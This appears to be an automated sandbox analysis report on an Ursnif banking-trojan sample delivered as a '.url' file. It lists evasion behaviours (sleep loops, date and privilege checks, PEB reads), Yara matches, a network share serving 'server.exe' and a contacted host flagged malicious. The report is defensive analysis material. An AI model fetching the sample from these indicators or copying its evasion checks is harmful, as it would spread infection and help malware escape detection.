Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 40 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 601 > 30 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 210 > 30 Jump to behavior
Found evasive API chain (date check)
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Window / User API: threadDelayed 472 Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Window / User API: threadDelayed 601 Jump to behavior
Found evasive API chain checking for process token information
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX7
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: server.exe, 00000005.00000002.2850719337.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to read the PEB
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B60D90 mov eax, dword ptr fs:[00000030h] 3_2_02B60D90
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B6092B mov eax, dword ptr fs:[00000030h] 3_2_02B6092B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D523B0 push dword ptr fs:[00000030h] 3_2_02D523B0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C56D58 push dword ptr fs:[00000030h] 5_2_02C56D58
Contains functionality to query CPU information (cpuid)
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B83BD3 cpuid 3_2_02B83BD3
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8213E SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep, 3_2_02B8213E
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B854D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_02B854D8
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B83BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_02B83BD3

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Opens network shares
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\server.exe Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\server.exe Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\server.exe Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\SystemResources\server.exe.mun Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\ Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\ Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\SystemResources\server.exe.mun Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\ Jump to behavior
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\ Jump to behavior

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 826967 Sample: marzo.txt.url Startdate: 15/03/2023 Architecture: WINDOWS Score: 88 21 Snort IDS alert for network traffic 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 Yara detected  Ursnif 2->25 27 Found malicious URL file 2->27 5 server.exe 6 2->5         started        9 server.exe 6 2->9         started        11 OUTLOOK.EXE 53 12 2->11         started        process3 dnsIp4 13 5.44.43.17, 49733, 80 MGNHOST-ASRU Russian Federation 5->13 15 checklist.skype.com 5->15 29 Detected unpacking (changes PE section rights) 5->29 31 Opens network shares 5->31 33 Writes or reads registry keys via WMI 5->33 35 Writes registry values via WMI 5->35 17 checklist.skype.com 9->17 19 192.229.221.95, 49705, 49720, 49727 EDGECASTUS United States 11->19 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
5.44.43.17
 unknown Russian Federation
202423 MGNHOST-ASRU true
192.229.221.95
 unknown United States
15133 EDGECASTUS false

Contacted Domains

Name IP Active
checklist.skype.com unknown unknown